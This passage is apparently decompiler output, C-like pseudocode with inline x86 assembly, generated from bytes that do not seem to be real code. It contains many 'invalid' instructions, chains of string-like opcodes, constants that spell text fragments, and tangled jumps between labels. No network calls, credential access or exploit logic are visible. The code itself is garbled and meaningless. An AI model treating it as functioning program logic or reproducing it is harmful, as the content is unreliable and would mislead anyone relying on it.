					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					 *__edi =  *__edi + __edi;
					_t414 =  *(_t401 + 0x74) * 0x73 - 1;
					 *__edi =  *__edi ^ __edi;
					_pop(ds);
					_t401 = 0xafadf0f4;
					_t352 = _t354;
					_t354 = __edi;
					 *0xFFFFFFFFAFADF0A0 =  *0xFFFFFFFFAFADF0A0 | 0x000000ed;
					_t255 = _t352 - 0xb9;
					 *((intOrPtr*)(__edx + 0x3ba912d4)) = cs;
					asm("cmc");
					asm("invalid");
					if(_t255 >= 0) {
						 *0xaa7e7c1b = _t255;
						_t255 = _t255 + 0xf0;
						_push(0xafadf0f4);
						_t354 = __edi ^  *(__ecx - 0x48ee309a);
						asm("cdq");
						asm("iretw");
						asm("adc [edi+0xaa000c], esi");
						asm("pushad");
						asm("rcl dword [ebx], cl");
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						 *_t255 =  *_t255 + _t255;
						asm("rol dword [0x4f0000], 0x0");
						goto L4;
					}
				}
				 *_t255 =  *_t255 + _t255;
				_t256 = _t255 |  *_t255;
				_push(_t394);
				asm("gs outsb");
				if(_t256 != 0) {
					L10:
					_t257 = _t256 |  *_t256;
					_t440 = _t257;
					_push(_t414);
					if(_t440 < 0) {
						goto L18;
					} else {
						asm("a16 jz 0x77");
						asm("popad");
						if(_t440 != 0) {
							 *_t394 =  *_t394 + _t257;
							 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t257;
							asm("bound ebp, [ecx+0x6c]");
							asm("bound eax, [eax]");
							_t347 = _t257 + 0x5e50748;
							asm("sti");
							_pop(es);
							asm("adc al, [ecx]");
							_t354 = _t354 + _t354;
							_t401 = _t401 +  *_t394;
							 *_t347 =  *_t347 + _t347;
							 *_t354 =  *_t354 + _t347;
							_t348 = _t347 + 0x706e5500;
							asm("insb");
							 *[gs:esi] =  *[gs:esi] + _t348;
							 *_t383 =  *_t383 + _t369;
							 *((intOrPtr*)(_t369 + 0x6e)) =  *((intOrPtr*)(_t369 + 0x6e)) + _t369;
							_t394 =  *(_t354 + 0x64) * 0x5003165;
							asm("repne push es");
							asm("in eax, 0x6");
							asm("cli");
							 *_t380 =  *_t380 + _t380;
							_t257 = _t348 + 0xb9 +  *((intOrPtr*)(_t348 + 0xb9));
							goto L14;
						}
					}
				} else {
					asm("gs insb");
					asm("popad");
					asm("outsb");
					_t351 = _t256 ^ 0x00000000 | 0x76000c01;
					asm("popad");
					asm("insb");
					asm("a16 insd");
					asm("gs outsb");
					 *_t351 =  *_t351 + _t351;
					_t380 = _t380 + 1;
					 *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) =  *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) + _t351;
					 *(_t394 + 0x61) =  *(_t394 + 0x61) + _t380;
					asm("insb");
					asm("a16 insd");
					asm("gs outsb");
					 *_t351 =  *_t351 + _t351;
					asm("sbb eax, [es:eax]");
					 *((intOrPtr*)(_t401 + 0x18)) =  *((intOrPtr*)(_t401 + 0x18)) + _t351;
					 *_t351 =  *_t351 + _t351;
					_t257 =  *(_t383 + 0x68) * 0x35006465;
					_t414 = _t351;
					asm("sbb eax, 0x440000");
					_t394 = _t394 + 1;
					_t383 = _t383 + _t383;
					 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t401;
					 *_t257 =  *_t257 + _t257;
					 *0x6d615300 =  *0x6d615300 + _t257;
					asm("insd");
					 *[gs:esi] =  *[gs:esi] + _t257;
					 *0x72655400 =  *0x72655400 + _t369;
					_t438 =  *0x72655400;
					if(_t438 != 0) {
						L15:
						_pop(es);
						 *((intOrPtr*)(_t380 + 0x75)) =  *((intOrPtr*)(_t380 + 0x75)) + _t380;
						asm("outsb");
						goto L16;
					} else {
						if(_t438 == 0) {
							L14:
							_t354 = _t354 + _t354;
							_t401 = _t401 +  *_t380;
							 *_t257 =  *_t257 + _t257;
							 *((intOrPtr*)(_t383 + _t257)) =  *((intOrPtr*)(_t383 + _t257)) + _t257;
							goto L15;
						} else {
							if(_t438 >= 0) {
								L16:
								asm("a16 jae 0x77");
								 *[gs:esi] =  *[gs:esi] + _t257;
								 *_t369 =  *_t369 + _t369;
								 *((intOrPtr*)(_t394 + 0x6f)) =  *((intOrPtr*)(_t394 + 0x6f)) + _t257;
								asm("insb");
								asm("a16 aaa");
								 *0x28e0146 =  *0x28e0146 + _t257;
								if( *0x28e0146 >= 0) {
									 *(_t380 + _t380) =  *(_t380 + _t380) + 1;
									L18:
									_t257 = _t257 +  *_t257;
								}
								_t354 = _t354 + _t354;
								_t401 = _t401 +  *((intOrPtr*)(_t257 + _t257));
							} else {
								_t394 = 1 +  *_t380 * 5;
								asm("movsd");
								_t256 = _t257 + 0x120296;
								_t354 = _t354 +  *((intOrPtr*)(_t401 + 7)) + _t354 +  *((intOrPtr*)(_t401 + 7));
								_t401 = _t401 +  *_t256;
								 *_t256 =  *_t256 + _t256;
								 *_t380 =  *_t380 + _t256;
								goto L10;
							}
						}
					}
				}
				 *_t257 =  *_t257 + _t257;
				_t258 = _t257 + 0x54530008;
				_t384 = _t383 - 1;
				_push(_t380);
				_t370 = _t369 + 1;
				_t355 = _t354 - 1;
				_push(_t355);
				_t402 = _t401 + 1;
				 *_t394 =  *_t394 + _t258;
				 *_t380 =  *_t380 + _t370;
				 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t258;
				asm("insb");
				_t415 =  *(_t384 + 0x73) * 0x7474616d;
				 *0x88003cf =  *0x88003cf + _t258;
				_t385 = _t384 - 1;
				 *_t380 =  *_t380 + _t380;
				 *_t355 =  *_t355 + 1;
				_t261 = _t258 + 0xdb ^  *(_t258 + 0xdb);
				 *_t261 =  *_t261 + _t261;
				_push(es);
				_t262 = _t261 |  *_t261;
				_push(_t262);
				if(_t262 >= 0) {
					L30:
					_t380 = _t380 +  *((intOrPtr*)(_t370 + 0x30031c03));
					 *_t380 =  *_t380 + _t380;
					_pop(es);
					_t355 = _t355 + _t355;
					goto L31;
				} else {
					asm("arpl [eax+0x6f], bp");
					_t415 =  *[fs:ecx+0x38] * 0xe010600;
					_t41 = _t394 + 0x67;
					 *_t41 =  *((intOrPtr*)(_t394 + 0x67)) + _t370;
					_t448 =  *_t41;
					asm("insb");
					asm("gs outsb");
					asm("popad");
					if(_t448 <= 0) {
						L31:
						 *_t355 =  *_t355 + 1;
						asm("das");
						 *_t262 =  *_t262 + _t262;
						 *_t370 =  *_t370 + _t370;
						asm("str word [ebx+0x75]");
						goto L32;
					} else {
						if(_t448 >= 0) {
							L32:
							_t355 = _t355 - 1;
							_t454 = _t355;
							if(_t454 != 0) {
								asm("bound esp, [ebp+0x6c]");
								goto L48;
							} else {
								if(_t454 >= 0) {
									L51:
									 *_t355 =  *_t355 + 1;
									_t265 = (_t262 |  *_t262) - 0xc000000 + 0x52594400;
									_t402 = _t402 + 1;
									_push(_t265);
									 *_t394 =  *_t394 + _t265;
									 *_t394 =  *_t394 + _t370;
									_t59 = _t355 + 0x65;
									 *_t59 =  *((intOrPtr*)(_t355 + 0x65)) + _t265;
									_t464 =  *_t59;
									if(_t464 < 0) {
										goto L63;
									} else {
										asm("bound esi, [edx+0x6f]");
										if(_t464 >= 0) {
											goto L64;
										} else {
											_t402 =  *(_t394 + 0x61) * 0x500746e;
											_push(6);
											asm("aam 0x4");
											_push(_t394);
											_t265 = _t265 + 0xffffffffff000b44;
											 *_t265 =  *_t265 + _t265;
											 *0x68610005 =  *0x68610005 + _t370;
											asm("arpl [edi+0x70], bp");
											 *_t394 =  *_t394 + _t265;
											 *((intOrPtr*)(_t265 + _t265)) =  *((intOrPtr*)(_t265 + _t265)) + _t370;
											_t402 = _t402 +  *_t355 + 1;
											asm("outsb");
											_t417 =  *(_t402 + 0x6c) * 0x74;
											asm("insd");
											asm("popad");
											asm("outsb");
											if(_t417 >= 0) {
												goto L65;
											} else {
												 *0x37303b3 =  *0x37303b3 + _t265;
												_t467 =  *0x37303b3;
												if(_t467 < 0) {
													_t339 = _t265 ^  *(_t394 + _t355 * 4);
													goto L58;
												}
												goto L59;
											}
										}
									}
								} else {
									if(_t454 < 0) {
										goto L45;
									} else {
										if(_t454 >= 0) {
											L50:
											_pop(_t355);
											 *((intOrPtr*)(_t394 + 2)) =  *((intOrPtr*)(_t394 + 2)) + _t370;
											goto L51;
										} else {
											if(_t454 < 0) {
												L48:
												asm("insb");
												if (_t462 == 0) goto L49;
												_t262 = _t262 + 0x15b0447;
												goto L50;
											} else {
												asm("a16 outsb");
												 *_t262 =  *_t262 ^ _t262;
												_push(es);
												 *_t394 =  *_t394 + _t262;
												 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t262;
												asm("fs outsb");
												goto L38;
											}
										}
									}
								}
							}
						} else {
							asm("o16 insb");
							 *_t262 =  *_t262 ^ _t262;
							_t262 = _t262 + 0x7080100;
							asm("movsd");
							_push(es);
							 *_t385 =  *_t385 + _t262;
							asm("adc al, [0x2d03ff00]");
							 *_t262 =  *_t262 + _t262;
							 *_t385 =  *_t385 + _t262;
							 *_t262 =  *_t262 | _t262;
							_t370 = _t355;
							_t394 = _t394 - 0xffffffffffffffff;
							_t385 = _t385;
							_push(_t262);
							_push(_t415);
							 *_t394 =  *_t394 + _t262;
							 *_t380 =  *_t380 + _t370;
							_t43 = _t355 + 0x61;
							 *_t43 =  *((intOrPtr*)(_t355 + 0x61)) + _t262;
							_t449 =  *_t43;
							if(_t449 < 0) {
								L38:
								asm("outsb");
								_t340 = _t262 + 0x790076b;
								asm("stc");
								_t355 = _t355 + _t340;
								_t341 = _t340 + 0x12;
								 *_t341 =  *_t341 | _t341;
								 *_t355 =  *_t355 + 1;
								_t342 = _t341 & 0x0a000000;
								goto L39;
							} else {
								asm("outsb");
								asm("popad");
								if(_t449 < 0) {
									L39:
									_t265 = _t342;
									asm("o16 jb 0x72");
									if (_t265 >= 0) goto L40;
									_push(es);
									 *_t385 =  *_t385 + _t265;
									_t53 = _t385 + 0x65;
									 *_t53 =  *((intOrPtr*)(_t385 + 0x65)) + _t265;
									asm("outsb");
									if ( *_t53 < 0) goto L54;
									goto L41;
								} else {
									asm("movsb");
									_t385 = _t385 +  *((intOrPtr*)(_t380 + 0x61205));
									 *_t355 =  *_t355 + 1;
									_t344 = (_t262 ^ 0x00000000) + 0x808087b;
									 *_t344 =  *_t344 + _t344;
									 *_t355 =  *_t355 | _t370;
									_t46 = _t380 + 0x69;
									 *_t46 =  *((intOrPtr*)(_t380 + 0x69)) + _t344;
									_t450 =  *_t46;
									if(_t450 >= 0) {
										 *_t344 =  *_t344 | _t344;
										 *_t355 =  *_t355 + 1;
										_t339 = _t344 ^  *_t344;
										 *_t339 =  *_t339 + _t339;
										_t370 = _t370 |  *0x62757300;
										asm("bound esp, [ecx+0x6c]");
										asm("insb");
										asm("popad");
										if(_t370 >= 0) {
											L58:
											_t265 = _t339 + 0x9e;
											L59:
											_t380 = _t380 +  *_t380;
											 *_t355 =  *_t355 + 1;
											_t265 = _t265 - 0xe000000;
											_push(cs);
											_t67 = _t355 + 0x6d;
											 *_t67 =  *((intOrPtr*)(_t355 + 0x6d)) + _t380;
											_t470 =  *_t67;
											asm("outsd");
											if(_t470 != 0) {
												asm("adc [edx], ecx");
												goto L69;
											} else {
												if(_t470 < 0) {
													L69:
													_t265 = _t265 |  *_t265;
													_t476 = _t265;
													asm("popad");
													asm("outsb");
													if(_t476 == 0) {
														goto L77;
													} else {
														goto L70;
													}
												} else {
													if(_t470 >= 0) {
														L70:
														if(_t476 < 0) {
															L79:
															_push(es);
															asm("adc dl, [edx]");
															_t356 = _t355 + _t355;
															 *_t268 =  *_t268 + _t268;
															 *((intOrPtr*)(_t356 + _t370)) =  *((intOrPtr*)(_t356 + _t370)) + _t380;
															 *((intOrPtr*)(_t385 + 0x43)) =  *((intOrPtr*)(_t385 + 0x43)) + _t370;
															_push(_t417);
															_t269 = _t268 - 1;
															_t406 = _t402 +  *_t370 + 1;
															_push(_t380);
															_t372 = _t370 + 2;
															_t419 = _t417 + 1 - 1;
															_t380 = _t380 + 1;
															 *_t394 =  *_t394 + _t269;
															 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t269;
															asm("outsb");
															asm("outsd");
															asm("outsb");
															 *[gs:0x797043b] =  *[gs:0x797043b] + _t269;
														} else {
															if(_t476 != 0) {
																L76:
																asm("gs outsb");
																L77:
																asm("outsb");
																if (_t479 >= 0) goto L78;
																_t268 = _t265 + 0x041e042b ^  *_t380;
																asm("rol dword [esi], 0x12");
																goto L79;
															} else {
																asm("gs outsb");
																 *_t394 =  *_t394 + _t265;
																 *_t385 =  *_t385 + _t265;
																 *((intOrPtr*)(_t355 + 0x50)) =  *((intOrPtr*)(_t355 + 0x50)) + _t380;
																_pop(_t379);
																_t372 = _t379 - 1;
																_t394 = _t394;
																 *0x496053c =  *0x496053c + _t265;
																asm("lahf");
																es = _t417;
																asm("adc dl, [eax]");
																_t356 = _t355 + _t355;
																_t406 = _t402 +  *_t372;
																 *_t265 =  *_t265 + _t265;
																 *_t380 =  *_t380 + _t380;
																_t269 = _t265;
																_t419 = _t417 + 1;
																asm("gs insd");
																asm("outsd");
																 *_t394 =  *_t394 + _t269;
																 *_t356 =  *_t356 + _t372;
																_t78 = _t372 + 0x62 + _t406 * 2;
																 *_t78 =  *((intOrPtr*)(_t372 + 0x62 + _t406 * 2)) + _t372;
																if( *_t78 >= 0) {
																	asm("insb");
																	_t390 =  *(_t380 + 0x61) * 0x80050074;
																	 *0x31d0480 =  *0x31d0480 + _t269;
																	_t265 = _t269 ^  *0x111205f4;
																	_t355 = _t356 + _t356;
																	_t402 = _t406 +  *_t394;
																	 *_t265 =  *_t265 + _t265;
																	 *_t355 =  *_t355 + _t380;
																	_pop(es);
																	 *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) =  *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) + _t265;
																	_t394 = _t394 - 1;
																	_t385 = _t390 + 1 - 1;
																	_t479 = _t385;
																	_push(_t355);
																	 *_t394 =  *_t394 + _t265;
																	 *0x6c6f4300 =  *0x6c6f4300 + _t370;
																	asm("insb");
																	asm("popad");
																	asm("bound esi, [ebx+0x61]");
																	asm("insd");
																	asm("insd");
																	goto L76;
																}
															}
														}
													} else {
														asm("bound ebp, [edi+0x72]");
														 *[fs:esi] =  *[fs:esi] + _t265;
														 *0x726b7300 =  *0x726b7300 + _t265;
														_t415 =  *_t394 * 5;
														L63:
														_t266 = _t265 + 0x1fa00e5;
														 *_t394 = _t266;
														asm("repne add [edx], edx");
														_t265 = _t266 | 0x2703ff00;
														 *_t265 =  *_t265 + _t265;
														L64:
														 *_t265 =  *_t265 + _t265;
														asm("invd");
														 *((intOrPtr*)(_t385 + 0x4f)) =  *((intOrPtr*)(_t385 + 0x4f)) + _t380;
														_push(_t394);
														_push(_t380);
														_t370 = _t370 + 1;
														 *_t394 =  *_t394 + _t265;
														 *0x4b454200 =  *0x4b454200 + _t265;
														_t402 = _t402 + 1;
														_push(_t265);
														 *0x2fb085f =  *0x2fb085f + _t265;
														 *_t355 = _t265;
														asm("rol byte [edx], 0x12");
														_push(cs);
														_t355 = _t355 + _t355;
														_t417 = _t415 - 1 +  *((intOrPtr*)(_t265 + _t265));
														 *_t265 =  *_t265 + _t265;
														asm("adc [eax+eax], al");
														L65:
														 *((intOrPtr*)(_t355 + 0x63)) =  *((intOrPtr*)(_t355 + 0x63)) + _t380;
													}
												}
											}
										} else {
											goto L44;
										}
									} else {
										if(_t450 == 0) {
											L41:
											_t417 =  *_t355 * 0x2b049c05;
										} else {
											asm("outsb");
											 *[gs:0x701] =  *[gs:0x701] + _t344;
											_t48 = _t355 + 0x72;
											 *_t48 =  *((intOrPtr*)(_t355 + 0x72)) + _t380;
											_t451 =  *_t48;
											if(_t451 >= 0) {
												L44:
												_push(0x6006c61);
												 *_t355 =  *_t355 + _t370;
												_t55 = _t394 + 0x6c;
												 *_t55 =  *((intOrPtr*)(_t394 + 0x6c)) + _t339;
												_t462 =  *_t55;
												if (_t462 < 0) goto L56;
												L45:
												asm("fs outsd");
											} else {
												asm("outsb");
												if (_t451 == 0) goto L29;
												_t262 = _t344 + 0x3b102ce;
												goto L30;
											}
										}
									}
								}
							}
						}
					}
				}
				_t270 = _t269 + 0x97;
				_pop(es);
				asm("stosb");
				_t420 = _t419 + _t394;
				_pop(es);
				asm("adc dl, [ebx]");
				_t357 = _t356 + _t356;
				_t407 = _t406 +  *_t394;
				 *_t270 =  *_t270 + _t270;
				 *0x6e550005 =  *0x6e550005 + _t380;
				_push(0x6006961);
				 *_t385 =  *_t385 + _t372;
				_t97 = _t380 + 0x65;
				 *_t97 =  *((intOrPtr*)(_t380 + 0x65)) + _t270;
				asm("popad");
				asm("arpl [edi+0x6e], bp");
				if( *_t97 >= 0) {
					L87:
					_t372 = _t372 + 1;
					_t271 = _t270 + 0x2f300dd;
					asm("adc dl, [esi]");
					_t357 = _t357 + _t357;
					_t407 = _t407 +  *((intOrPtr*)(_t271 + _t271));
					 *_t271 =  *_t271 + _t271;
					asm("sbb [eax], cl");
					 *((intOrPtr*)(_t407 + 0x61)) =  *((intOrPtr*)(_t407 + 0x61)) + _t372;
					asm("a16 outsb");
					_t394 =  *(_t271 + 0x6f) * 0x1060074;
					_t272 = _t271 |  *_t271;
					goto L88;
				} else {
					asm("insb");
					asm("popad");
					asm("popad");
					asm("outsb");
					 *_t372 = _t270 + 0x3a60107;
					asm("rol byte [ebx], 1");
					asm("adc dl, [eax+eax]");
					 *_t357 =  *_t357 + 1;
					_t272 =  *_t372 ^ 0x16000000;
					_t483 = _t272;
					asm("lldt word [ebx+0x69]");
					asm("insb");
					if(_t483 == 0) {
						L89:
						asm("popad");
						asm("outsb");
						asm("arpl [ebp+0x6c], sp");
						goto L90;
					} else {
						if(_t483 < 0) {
							L88:
							 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t380;
							asm("insd");
							goto L89;
						} else {
							asm("outsd");
							if(_t483 < 0) {
								L90:
								asm("insb");
								_t274 = (_t272 ^  *[gs:eax]) + 0xea07d7;
								goto L91;
							} else {
								_t334 = _t272 ^  *_t272;
								_push(es);
								 *((intOrPtr*)(_t334 + _t334)) =  *((intOrPtr*)(_t334 + _t334)) + _t372;
								asm("popad");
								_push(0x5006465);
								 *_t394 =  *_t394 | _t334;
								_t336 = _t334 + 0xdf;
								_t422 = _t420 +  *0x151202;
								 *_t357 =  *_t357 + 1;
								 *[cs:eax] =  *[cs:eax] + _t336;
								 *_t385 =  *_t385 + _t380;
								_t278 = _t336 + 0x41524700;
								_push(_t394);
								_t408 = 1 +  *(_t420 + 0x73) * 0x61726c6a;
								 *_t394 =  *_t394 + _t278;
								 *_t385 =  *_t385 + _t372;
								_t103 = _t278 + 0x69;
								 *_t103 =  *((intOrPtr*)(_t278 + 0x69)) + _t380;
								_t484 =  *_t103;
								asm("insb");
								_push(0x6d657261);
								if(_t484 < 0) {
									if(_t484 > 0) {
										 *0x54105b4 =  *0x54105b4 + _t278;
										goto L87;
									}
									L91:
									 *((intOrPtr*)(_t274 + _t372)) =  *((intOrPtr*)(_t274 + _t372)) + _t274;
									_pop(ss);
									_t357 = _t357 + _t357;
									 *((intOrPtr*)(_t274 + 0x12)) =  *((intOrPtr*)(_t274 + 0x12)) + _t274 + 0x12;
									 *_t372 =  *_t372 + _t357;
									_t277 =  *[fs:eax] * 0x80106;
									_t394 = _t394 + 1;
									_t408 = _t407 + 1;
									_t380 = _t380 - 1;
									_t422 = _t420 +  *_t385 - 1;
									_push(_t277);
									_push(_t380);
									_t385 = _t385 - 1;
									_push(_t422);
									 *0x4c90290 =  *0x4c90290 + _t277;
									_t372 = _t372 +  *_t277;
									asm("adc eax, 0x181202");
									 *_t357 =  *_t357 + 1;
									_t278 = _t277 & 0x00000000;
									 *_t278 =  *_t278 + _t278;
									asm("sbb al, [eax+eax]");
								}
							}
						}
					}
				}
				_t279 = _t278;
				_t423 = _t422 + 1;
				asm("arpl [gs:ecx], bp");
				_push(es);
				 *_t394 =  *_t394 + _t279;
				 *((intOrPtr*)(_t279 + 0x52)) =  *((intOrPtr*)(_t279 + 0x52)) + _t380;
				_t387 = _t385 - 1 + 1;
				_push(_t380);
				_t373 = _t372 + 1;
				 *0x35001d5 =  *0x35001d5 + _t279;
				 *_t380 = _t279;
				asm("adc bl, [ecx]");
				_t358 = _t357 + _t357;
				_t409 = _t408 +  *_t394;
				 *_t279 =  *_t279 + _t279;
				 *_t358 =  *_t358 + _t358;
				_t280 = _t279 |  *_t279;
				_t489 = _t280;
				if(_t489 < 0) {
					L98:
					_push(_t380);
					_push(_t423);
					_t373 = _t373 + 1 - 1;
					_t387 = _t387 - 1;
					_t394 = _t394 - 1;
					goto L99;
				} else {
					if(_t489 <= 0) {
						L99:
						_push(_t358);
						_push(_t423);
						 *_t394 =  *_t394 + _t280;
						 *((intOrPtr*)(_t280 + _t280)) =  *((intOrPtr*)(_t280 + _t280)) + _t373;
						_push(_t409);
						asm("outsb");
						_t423 =  *(_t387 + 0x6c) * 0x75646e61;
						asm("insb");
						asm("popad");
						_t282 = (_t280 ^  *_t280) + 0x5ec062c;
						asm("lodsb");
						_push(es);
						_push(ss);
						_push(es);
						asm("adc bl, [eax+eax]");
						 *_t358 =  *_t358 + 1;
						 *_t282 =  *_t282 - _t282;
						 *_t282 =  *_t282 + _t282;
						_push(ds);
						_t280 = _t282 |  *_t282;
						_t493 = _t280;
						asm("insb");
						asm("a16 gs insd");
						if(_t493 <= 0) {
							asm("popad");
							if (_t493 == 0) goto L101;
							_push(es);
							goto L102;
						}
					} else {
						if(_t489 <= 0) {
							goto L98;
						} else {
							asm("bound ebp, [ecx+edi*2+0x74]");
							 *_t394 =  *_t394 + _t280;
							 *_t380 =  *_t380 + _t373;
							 *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) =  *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) + _t380;
							_push(0x65);
							asm("insb");
							asm("popad");
							asm("outsb");
							 *[fs:0x451017f] =  *[fs:0x451017f] + _t280;
							es = _t387;
							asm("hlt");
							_push(es);
							asm("adc bl, [edx]");
							_t358 = _t358 + _t358;
							_t394 = _t394 +  *_t373;
							 *_t280 =  *_t280 + _t280;
							 *((intOrPtr*)(_t358 + _t373)) =  *((intOrPtr*)(_t358 + _t373)) + _t358;
							_t123 = _t358 + 0x6c;
							 *_t123 =  *((intOrPtr*)(_t358 + 0x6c)) + _t373;
							_t490 =  *_t123;
							asm("popad");
							if(_t490 < 0) {
								L103:
								asm("insd");
								_pop(_t409);
								_t394 = _t394 +  *((intOrPtr*)(_t358 + 4));
								_t329 =  *(_t380 + _t380) * 0x1d;
								 *_t329 =  *_t329 + _t329;
								_pop(ds);
								_push(es);
								 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t329;
								asm("popad");
								asm("insd");
								 *[gs:eax] =  *[gs:eax] ^ _t329;
								_t331 = _t329 +  *_t373;
								_t373 = _t373 + 1;
								_t423 = _t423 +  *((intOrPtr*)(_t329 + _t329)) - 1;
								_t367 = _t358 + _t358 - 1;
								 *0x3080325 =  *0x3080325 + _t331;
								asm("outsd");
								 *(_t387 + 0xa) =  *(_t387 + 0xa) | _t367;
								asm("adc bl, [esi]");
								_t358 = _t367 + _t367;
								_t280 = _t331 +  *((intOrPtr*)(_t331 + _t331));
								 *_t394 =  *_t394 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *0x10040 =  *0x10040 + _t380;
								es = _t387;
								 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
								 *_t280 =  *_t280 + _t280;
								asm("invalid");
								asm("invalid");
								asm("invalid");
								asm("invalid");
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 ^ _t280;
							} else {
								asm("outsb");
								if(_t490 <= 0) {
									L102:
									 *0x6f6c6200 =  *0x6f6c6200 + _t280;
									goto L103;
								} else {
									asm("outsb");
									_t409 =  *_t394 * 0xc0106;
									_push(_t358);
									_push(_t423);
									_t380 = _t380 + 1;
									_t423 = _t423 - 1;
									_push(_t358);
									_push(_t423);
									_push(_t380);
									 *0x7ca0190 =  *0x7ca0190 + _t280;
									_t358 = 0x12026a04;
									asm("sbb eax, [eax]");
									 *0x12026a04 =  *0x12026a04 + 1;
									_t280 = _t280 ^ 0x00000000;
									 *_t280 =  *_t280 + _t280;
									asm("sbb eax, 0x5845000e");
									_t373 = _t373 + 1 + 2;
									_push(_t409);
									_t387 = _t387 - 1 + 1;
									_push(_t409);
									goto L98;
								}
							}
						}
					}
				}
				_t283 = _t280 + 1;
				 *((intOrPtr*)(_t283 + 0x40d0)) =  *((intOrPtr*)(_t283 + 0x40d0)) + _t283;
				 *_t283 =  *_t283 + _t283;
				_t284 = _t283 + _t380;
				asm("sbb esi, [esi]");
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				asm("les ebx, [eax]");
				_t285 = _t284 + 1;
				 *_t373 =  *_t373 + _t285;
				 *_t380 =  *_t380 + _t285;
				 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
				 *_t285 =  *_t285 + _t285;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				_pop(ds);
				_t287 = _t285 + 2;
				 *_t287 =  *_t287 + _t380;
				asm("rol byte [eax], 1");
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				asm("pushad");
				asm("sbb eax, 0x76");
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				asm("cld");
				asm("sbb [eax], al");
				 *_t287 =  *_t287 + _t287;
				 *_t394 = ds;
				_t289 = _t287 +  *_t287 + 1;
				 *_t289 =  *_t289 + _t289;
				 *_t289 =  *_t289 + _t289;
				_t359 = _t358 + _t358;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t289 =  *_t289 + 1;
				 *_t289 =  *_t289 + _t289;
				 *((intOrPtr*)(_t289 + 0x1f)) =  *((intOrPtr*)(_t289 + 0x1f)) + _t380;
				_t290 = _t289 + 1;
				 *((intOrPtr*)(_t290 - 0x30)) =  *((intOrPtr*)(_t290 - 0x30)) + _t290;
				_t291 = _t290 + 1;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *((intOrPtr*)(_t291 + 0x761c)) =  *((intOrPtr*)(_t291 + 0x761c)) + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *((intOrPtr*)(_t373 + _t359)) =  *((intOrPtr*)(_t373 + _t359)) + _t380;
				_t292 = _t291 + 1;
				 *_t373 =  *_t373 + _t292;
				 *((intOrPtr*)(_t292 + _t292)) =  *((intOrPtr*)(_t292 + _t292)) + _t292;
				 *_t394 = ds;
				_t293 = _t292 + 1;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				_t360 = _t359 + _t359;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t293 =  *_t293 + 1;
				 *_t293 =  *_t293 + _t293;
				 *((intOrPtr*)(_t293 + 0x5000401f)) =  *((intOrPtr*)(_t293 + 0x5000401f)) + _t293;
				asm("rol byte [eax], 1");
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				asm("sbb byte [0x76], 0x0");
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *((intOrPtr*)(_t373 + _t360 + 0x40)) =  *((intOrPtr*)(_t373 + _t360 + 0x40)) + _t373;
				 *_t373 =  *_t373 + _t293;
				 *0x401e8c00 =  *0x401e8c00 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				_t361 = _t360 + _t360;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t293 =  *_t293 + 1;
				 *_t293 =  *_t293 + _t293;
				_pop(ds);
				_t295 = _t293 + _t380 + 1;
				 *((intOrPtr*)(_t295 - 0x30)) =  *((intOrPtr*)(_t295 - 0x30)) + _t295;
				_t296 = _t295 + 1;
				 *_t296 =  *_t296 + _t296;
